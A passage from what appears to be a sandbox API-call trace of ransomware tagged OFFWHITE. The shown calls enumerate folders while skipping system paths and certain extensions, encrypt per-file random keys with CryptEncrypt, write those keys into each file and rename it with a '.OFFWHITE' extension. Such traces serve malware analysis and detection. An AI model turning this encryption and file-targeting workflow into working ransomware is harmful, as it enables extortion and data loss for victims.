lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="tokens.dat", cAlternateFileName="")) returned 1 [0146.489] lstrcmpiW (lpString1="tokens.dat", lpString2=".") returned 1 [0146.489] lstrcmpiW (lpString1="tokens.dat", lpString2="..") returned 1 [0146.489] lstrcmpiW (lpString1="tokens.dat", lpString2="...") returned 1 [0146.489] lstrcmpiW (lpString1="tokens.dat", lpString2="windows") returned -1 [0146.489] lstrcmpiW (lpString1="tokens.dat", lpString2="$recycle.bin") returned 1 [0146.489] lstrcmpiW (lpString1="tokens.dat", lpString2="rsa") returned 1 [0146.489] lstrcmpiW (lpString1="tokens.dat", lpString2="ntuser.dat") returned 1 [0146.489] lstrcmpiW (lpString1="tokens.dat", lpString2="programdata") returned 1 [0146.489] lstrcmpiW (lpString1="tokens.dat", lpString2="appdata") returned 1 [0146.489] lstrcmpiW (lpString1="tokens.dat", lpString2="program files") returned 1 [0146.489] lstrcmpiW (lpString1="tokens.dat", lpString2="program files (x86)") returned 1 [0146.489] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\" [0146.489] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\", lpString2="tokens.dat" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" [0146.489] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.489] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.489] PathFindExtensionW (pszPath="tokens.dat") returned=".dat" [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".cab") returned 1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".cmd") returned 1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".com") returned 1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".cpl") returned 1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".url") returned -1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".ttf") returned -1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".mp3") returned -1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".pif") returned -1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".mp4") returned -1 [0146.489] lstrcmpiW (lpString1=".dat", lpString2=".OFFWHITE") returned -1 [0146.490] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0146.490] lstrcmpiW (lpString1="tokens.dat", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.490] GetProcessHeap () returned 0x500000 [0146.490] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546f38 [0146.490] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0146.495] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=4627413) returned 1 [0146.495] GetProcessHeap () returned 0x500000 [0146.495] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.495] GetProcessHeap () returned 0x500000 [0146.495] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.495] GetProcessHeap () returned 0x500000 [0146.495] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.495] GetProcessHeap () returned 0x500000 [0146.495] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.495] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.495] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.495] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.495] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.495] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.495] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.496] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.496] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.496] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295dc90*=0x100) returned 1 [0146.496] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.496] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.496] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0146.496] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x469bd5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.496] SetLastError (dwErrCode=0x0) [0146.496] WriteFile (in: hFile=0x21c, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0146.499] GetLastError () returned 0x0 [0146.499] GetLastError () returned 0x0 [0146.499] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x469cd5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.499] WriteFile (in: hFile=0x21c, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0146.499] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x469dd5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.499] WriteFile (in: hFile=0x21c, lpBuffer=0x546f38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x546f38*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0146.499] GetProcessHeap () returned 0x500000 [0146.499] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2a60020 [0146.500] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.500] ReadFile (in: hFile=0x21c, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295dec0*=0x927c0, lpOverlapped=0x0) returned 1 [0146.571] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.571] WriteFile (in: hFile=0x21c, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295decc*=0x927c0, lpOverlapped=0x0) returned 1 [0146.573] GetProcessHeap () returned 0x500000 [0146.573] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0146.576] CloseHandle (hObject=0x21c) returned 1 [0146.576] GetProcessHeap () returned 0x500000 [0146.576] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.576] GetProcessHeap () returned 0x500000 [0146.576] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.577] GetProcessHeap () returned 0x500000 [0146.577] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.577] GetProcessHeap () returned 0x500000 [0146.577] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.577] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" [0146.577] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.OFFWHITE" [0146.577] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.offwhite")) returned 1 [0146.578] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="tokens.dat", cAlternateFileName="")) returned 0 [0146.578] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0146.578] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="RAC", cAlternateFileName="")) returned 1 [0146.578] lstrcmpiW (lpString1="RAC", lpString2=".") returned 1 [0146.578] lstrcmpiW (lpString1="RAC", lpString2="..") returned 1 [0146.578] lstrcmpiW (lpString1="RAC", lpString2="...") returned 1 [0146.578] lstrcmpiW (lpString1="RAC", lpString2="windows") returned -1 [0146.578] lstrcmpiW (lpString1="RAC", lpString2="$recycle.bin") returned 1 [0146.578] lstrcmpiW (lpString1="RAC", lpString2="rsa") returned -1 [0146.578] lstrcmpiW (lpString1="RAC", lpString2="ntuser.dat") returned 1 [0146.578] lstrcmpiW (lpString1="RAC", lpString2="programdata") returned 1 [0146.578] lstrcmpiW (lpString1="RAC", lpString2="appdata") returned 1 [0146.578] lstrcmpiW (lpString1="RAC", lpString2="program files") returned 1 [0146.578] lstrcmpiW (lpString1="RAC", lpString2="program files (x86)") returned 1 [0146.578] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0146.578] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="RAC" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC") returned="C:/Users\\All Users\\Microsoft\\RAC" [0146.578] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\" [0146.578] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\" [0146.578] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\*.*") returned="C:/Users\\All Users\\Microsoft\\RAC\\*.*" [0146.578] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\RAC\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0146.579] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.579] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0146.579] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.579] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.579] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Outbound", cAlternateFileName="")) returned 1 [0146.579] lstrcmpiW (lpString1="Outbound", lpString2=".") returned 1 [0146.579] lstrcmpiW (lpString1="Outbound", lpString2="..") returned 1 [0146.579] lstrcmpiW (lpString1="Outbound", lpString2="...") returned 1 [0146.579] lstrcmpiW (lpString1="Outbound", lpString2="windows") returned -1 [0146.579] lstrcmpiW (lpString1="Outbound", lpString2="$recycle.bin") returned 1 [0146.579] lstrcmpiW (lpString1="Outbound", lpString2="rsa") returned -1 [0146.579] lstrcmpiW (lpString1="Outbound", lpString2="ntuser.dat") returned 1 [0146.579] lstrcmpiW (lpString1="Outbound", lpString2="programdata") returned -1 [0146.579] lstrcmpiW (lpString1="Outbound", lpString2="appdata") returned 1 [0146.579] lstrcmpiW (lpString1="Outbound", lpString2="program files") returned -1 [0146.579] lstrcmpiW (lpString1="Outbound", lpString2="program files (x86)") returned -1 [0146.579] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\" [0146.579] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\", lpString2="Outbound" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Outbound") returned="C:/Users\\All Users\\Microsoft\\RAC\\Outbound" [0146.579] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Outbound", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Outbound\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\Outbound\\" [0146.579] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\Outbound\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Outbound\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\Outbound\\" [0146.579] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Outbound\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Outbound\\*.*") returned="C:/Users\\All Users\\Microsoft\\RAC\\Outbound\\*.*" [0146.579] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\RAC\\Outbound\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0146.580] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.580] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0146.580] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.580] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.580] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 0 [0146.580] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0146.580] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbafd7360, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbafd7360, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="PublishedData", cAlternateFileName="PUBLIS~1")) returned 1 [0146.580] lstrcmpiW (lpString1="PublishedData", lpString2=".") returned 1 [0146.580] lstrcmpiW (lpString1="PublishedData", lpString2="..") returned 1 [0146.580] lstrcmpiW (lpString1="PublishedData", lpString2="...") returned 1 [0146.580] lstrcmpiW (lpString1="PublishedData", lpString2="windows") returned -1 [0146.580] lstrcmpiW (lpString1="PublishedData", lpString2="$recycle.bin") returned 1 [0146.580] lstrcmpiW (lpString1="PublishedData", lpString2="rsa") returned -1 [0146.580] lstrcmpiW (lpString1="PublishedData", lpString2="ntuser.dat") returned 1 [0146.580] lstrcmpiW (lpString1="PublishedData", lpString2="programdata") returned 1 [0146.580] lstrcmpiW (lpString1="PublishedData", lpString2="appdata") returned 1 [0146.580] lstrcmpiW (lpString1="PublishedData", lpString2="program files") returned 1 [0146.580] lstrcmpiW (lpString1="PublishedData", lpString2="program files (x86)") returned 1 [0146.580] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\" [0146.580] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\", lpString2="PublishedData" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData") returned="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData" [0146.580] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\" [0146.581] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\" [0146.581] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*") returned="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*" [0146.581] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbafd7360, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbafd7360, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0146.581] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.581] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbafd7360, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbafd7360, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0146.581] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.581] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.581] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xbafd7360, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xe3866f30, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 1 [0146.581] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2=".") returned 1 [0146.581] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="..") returned 1 [0146.581] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="...") returned 1 [0146.581] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="windows") returned -1 [0146.581] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="$recycle.bin") returned 1 [0146.581] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="rsa") returned -1 [0146.581] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="ntuser.dat") returned 1 [0146.581] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="programdata") returned 1 [0146.581] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="appdata") returned 1 [0146.581] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="program files") returned 1 [0146.581] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="program files (x86)") returned 1 [0146.581] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\" [0146.581] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\", lpString2="RacWmiDatabase.sdf" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf") returned="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" [0146.581] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.582] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.582] PathFindExtensionW (pszPath="RacWmiDatabase.sdf") returned=".sdf" [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".exe") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".log") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".cab") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".cmd") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".com") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".cpl") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".ini") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".dll") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".url") returned -1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".ttf") returned -1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".mp3") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".pif") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".mp4") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".OFFWHITE") returned 1 [0146.582] lstrcmpiW (lpString1=".sdf", lpString2=".msi") returned 1 [0146.582] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.582] GetProcessHeap () returned 0x500000 [0146.582] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546f48 [0146.582] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 